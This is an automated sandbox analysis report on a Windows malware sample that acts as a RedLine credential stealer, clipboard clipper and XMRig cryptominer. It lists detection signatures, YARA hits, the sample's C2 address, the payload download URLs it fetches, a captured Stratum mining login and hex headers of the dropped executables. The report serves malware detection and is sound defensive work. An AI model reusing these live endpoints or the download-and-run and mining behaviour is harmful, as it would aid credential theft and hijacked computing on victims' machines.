Windows Analysis Report 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe

Overview

General Information

Sample Name: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Analysis ID: 553228
MD5: c7f9efb09db59923b3f96fd1ef2f0873
SHA1: 43ee2579fef8ff0c3a5d53f3dc4306bbdf04d484
SHA256: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001dd491ac614fdef1fa149
Tags: CoinMinerXMRigexe
Infos:

Most interesting Screenshot:

Detection

BitCoin Miner RedLine Redline Clipper SilentXMRMiner Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Redline Clipper
Yara detected SilentXMRMiner
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Yara detected BitCoin Miner
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Uses known network protocols on non-standard ports
Detected Stratum mining protocol
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Sigma detected: Suspicius Add Task From User AppData Temp
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Creates driver files
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Creates a window with clipboard capturing capabilities
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Avira: detection malicious, Label: HEUR/AGEN.1145980
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Avira: detection malicious, Label: HEUR/AGEN.1145980
Source: C:\Users\user\AppData\Local\Temp\services64.exe Avira: detection malicious, Label: HEUR/AGEN.1145980
Found malware configuration
Source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp Malware Configuration Extractor: RedLine {"C2 url": "95.143.179.185:31334"}
Multi AV Scanner detection for submitted file
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Virustotal: Detection: 34% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\AppData\Local\Temp\services64.exe Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Metadefender: Detection: 31% Perma Link
Source: C:\Users\user\AppData\Local\Temp\sistem.exe ReversingLabs: Detection: 75%
Machine Learning detection for sample
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Joe Sandbox ML: detected

Bitcoin Miner:

barindex
Yara detected SilentXMRMiner
Source: Yara match File source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
Yara detected BitCoin Miner
Source: Yara match File source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000000.799518871.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.927622766.0000000140752000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.810205943.00000224D7AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.819000457.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.927522845.0000000140752000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.821033223.0000020180001000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.801221568.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.796871079.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.804927838.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.918136554.00000000004BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.814593137.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.917920684.000000000130B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.794400216.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.812542531.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4876, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Detected Stratum mining protocol
Source: global traffic TCP traffic: 192.168.2.4:49816 -> 157.90.156.89:6004 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"6059336","pass":"myminer","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
Source: global traffic TCP traffic: 192.168.2.4:49822 -> 157.90.156.89:6004 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"6059336","pass":"myminer","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.

Compliance:

barindex
Uses 32bit PE files
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: mine.bmpool.org
Source: C:\Windows\explorer.exe Network Connect: 157.90.156.89 116 Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 7777
Source: unknown Network traffic detected: HTTP traffic on port 7777 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 7777
Source: unknown Network traffic detected: HTTP traffic on port 7777 -> 49779
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cabura-cash.pw/sistem.exe HTTP/1.1Host: 45.82.70.152:7777Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cabura-cash.pw/4545.exe HTTP/1.1Host: 45.82.70.152:7777
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 13:10:41 GMTContent-Type: application/x-msdos-programContent-Length: 3514792Connection: keep-aliveLast-Modified: Sun, 09 Jan 2022 11:37:55 GMTETag: "35a1a8-5d524a6ac8241"Accept-Ranges: bytesX-Robots-Tag: noindex, nofollow, nosnippet, noarchiveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 ed 8e da 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 1d 00 98 04 00 00 54 01 00 00 00 00 00 00 30 02 00 00 10 00 00 00 b0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 55 00 00 04 00 00 85 44 37 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c fc 50 00 20 01 00 00 00 c0 50 00 1d 2e 00 00 00 00 00 00 00 00 00 00 00 7e 35 00 a8 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 43 18 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 02 00 00 30 02 00 00 7a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 00 00 00 b0 04 00 00 72 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 a0 05 00 00 04 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 3e 27 18 00 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 d0 32 00 00 f0 1d 00 00 b4 2f 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 30 00 00 00 c0 50 00 00 24 00 00 00 a8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 32 77 31 34 30 54 54 00 c0 04 00 00 f0 50 00 00 b2 04 00 00 cc 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 61 64 61 74 61 00 00 00 10 00 00 00 b0 55 00 00 00 00 00 00 7e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 13:10:43 GMTContent-Type: application/x-msdos-programContent-Length: 2233856Connection: keep-aliveLast-Modified: Fri, 14 Jan 2022 12:21:45 GMTETag: "221600-5d589d8a97da5"Accept-Ranges: bytesX-Robots-Tag: noindex, nofollow, nosnippet, noarchiveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 06 00 00 16 00 00 00 fc 21 00 00 00 00 00 fa 22 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 22 00 00 04 00 00 7a af 22 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 27 22 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 40 22 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 22 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 14 00 00 00 10 00 00 00 16 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e f9 21 00 00 30 00 00 00 fa 21 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 ac 0f 00 00 00 30 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 70 64 61 74 61 00 00 90 00 00 00 00 40 22 00 00 02 00 00 00 14 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49775 -> 95.143.179.185:31334
Source: global traffic TCP traffic: 192.168.2.4:49778 -> 45.82.70.152:7777
Source: global traffic TCP traffic: 192.168.2.4:49816 -> 157.90.156.89:6004
Source: AppLaunch.exe, 00000001.00000002.735161723.0000000007112000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:7777
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:7777/cabura-cash.pw/4545.exe
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735161723.0000000007112000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:7777/cabura-cash.pw/sistem.exe
Source: AppLaunch.exe, 00000001.00000002.735161723.0000000007112000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:77774
Source: AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmp String found in binary or memory: http://45.82.70.152:7777D8
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
